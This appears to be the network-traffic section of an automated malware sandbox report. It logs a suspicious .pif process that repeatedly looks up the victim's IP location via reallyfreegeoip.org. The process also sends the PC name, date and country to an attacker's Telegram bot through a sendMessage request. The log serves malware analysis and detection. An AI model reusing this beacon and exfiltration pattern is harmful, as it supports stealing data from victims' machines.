                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:24 UTC854INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:24 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461253
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hV9wAzLSkUuKSNQY5URKRpPV9PmAPJc729xGDFfF1gL2K6UVEi%2Bi7iWJJODk8hKkXLBIZYLLK9ypy6LQxHLprD9mmf2sIyipft08rJ9bCq27FGYremVDQqzjfaQAOmwL%2F%2BdeIbK3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbed4f784273-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1775&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1632196&cwnd=32&unsent_bytes=0&cid=020eb63f55741d7b&ts=142&x=0"
                                                                                                                                          2025-01-06 06:54:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.553643149.154.167.2204437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:25 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:18:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:25 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:25 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2025-01-06 06:54:25 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.553644188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:25 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:25 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:25 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461254
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pHK8k1sTlefWu7XbDssev%2BIhyN8qdJkFUjndizeeAB6retYQnqtEAHY%2BFaRusmDA621uCodsR3v6LQIyrYcLfjzKD%2Fkutz95Mw4NefjxDUd3KdSLbDls%2BpbDLPVnuEa9wZxQusBs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbf27fa18c89-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1761&rtt_var=688&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1558996&cwnd=202&unsent_bytes=0&cid=0e4caa62b51caf5e&ts=156&x=0"
                                                                                                                                          2025-01-06 06:54:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.553657188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:27 UTC851INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:27 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461256
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YTBjnRSux85wMqOO2zPipvBXJkITZf6Q5UZ6eRHqUwa7eic0Xl6ayUdxKt8uZHgar9D2edjHuynkXXBHBahGvmrphu38KN2UiGBg%2BjOXjzc4iHPUCDkN8nHBzxUJIAkpQzJERI3l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cbfdcf0342be-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1692&rtt_var=673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1580086&cwnd=213&unsent_bytes=0&cid=11eab855c418c4d2&ts=161&x=0"
                                                                                                                                          2025-01-06 06:54:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.553667188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:28 UTC867INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:28 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461258
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hzm%2BsE4m5jVdSlP4BWZB1Q2%2BGOcoLy9QX7R6TWHyfT1nbo85jU%2BnwOtfuZR5DJR2Pg1V8Donri3m49t4A%2FHKMi%2BzPHg%2BXQcY7ZoUUa8jocZxUpGG1oO%2FHy%2FPaY4dI%2BOtTWXsSuWp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc06a8668c59-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1801&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1604395&cwnd=196&unsent_bytes=0&cid=8ba1ad52375b5f16&ts=135&x=0"
                                                                                                                                          2025-01-06 06:54:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.553677188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:30 UTC861INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:30 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461259
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3De0hopA1eHegT%2Bpl%2BCT1aBd2hKH6AtwnpDrkYtWrs%2B8qJ4uhWD15%2F7x%2FI9s7EH0pxk1auafIOr%2FWp1jKatBVer0TUTJuM3sWwHm544hZkpf1bOTYE1yNDA2PUuVJBdAcKSx6cDy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc0fd8710f80-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1463&rtt_var=556&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1957104&cwnd=207&unsent_bytes=0&cid=07c4690c4864d2df&ts=137&x=0"
                                                                                                                                          2025-01-06 06:54:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.553689188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:31 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:31 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461260
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mc2C12fYYb3Fvduzhqhs7qRKMo8hShgD%2F%2FGv2TAB3z3KUlPI3u22CLh%2B0Q4AU4doUEtEqNfGlGrWYZk%2Bshf5Rc4gjpFjxooXIG3rbnwk8DGUKT33h1v%2FpqyOT8nPUVYlrk9eaLCQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc189ff178e7-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1444829&cwnd=234&unsent_bytes=0&cid=0cbb088b91578400&ts=157&x=0"
                                                                                                                                          2025-01-06 06:54:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.553696188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:32 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:32 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461261
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=on72%2BeUOPlKGHX9wXf%2BjoxWb8saqnXoTrnZG8mRhABrFdXiauZ29MmKds4GK0Svh4D3o021zIXXxN48vxNg3IH9vFZjuEuAJI3v3xp74DelQkUKIFviS847bMgsmLJORv%2BdgHKsl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc1d19248cb4-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1947&rtt_var=747&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1447694&cwnd=189&unsent_bytes=0&cid=d82de755b2e75d61&ts=195&x=0"
                                                                                                                                          2025-01-06 06:54:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.553701188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:33 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:33 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461262
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jlNyefcL7o3ZxKPJsietoYM1EiHdlZnY%2BqmvfUXQb4phnj1n5h3y80Z%2Bf4mjJqsWVYWUe70nKKvaH71RG%2BjU9ifjqSoIQ3RYvyeX%2FnL00ww2Q3L9t%2Bb23lgzGLAyO8i68H5pSd0C"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc211a794201-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2443&min_rtt=2429&rtt_var=921&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1202140&cwnd=225&unsent_bytes=0&cid=c6aad835eb5e261b&ts=132&x=0"
                                                                                                                                          2025-01-06 06:54:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.553705188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:33 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:33 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461262
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FcXB365aE%2BoDPlf7SSoXnSvPpzaiCe1F2RxdApwdv5IjABFj%2BP168UigIUO6v1StrWvBwwnubPrd4c9diULETqA2bzkreEbWcueoC5grR1NuovH2GQ1N5ZHYk1Vt%2B%2BBfFyVzsQjh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc227bf15e7d-EWR
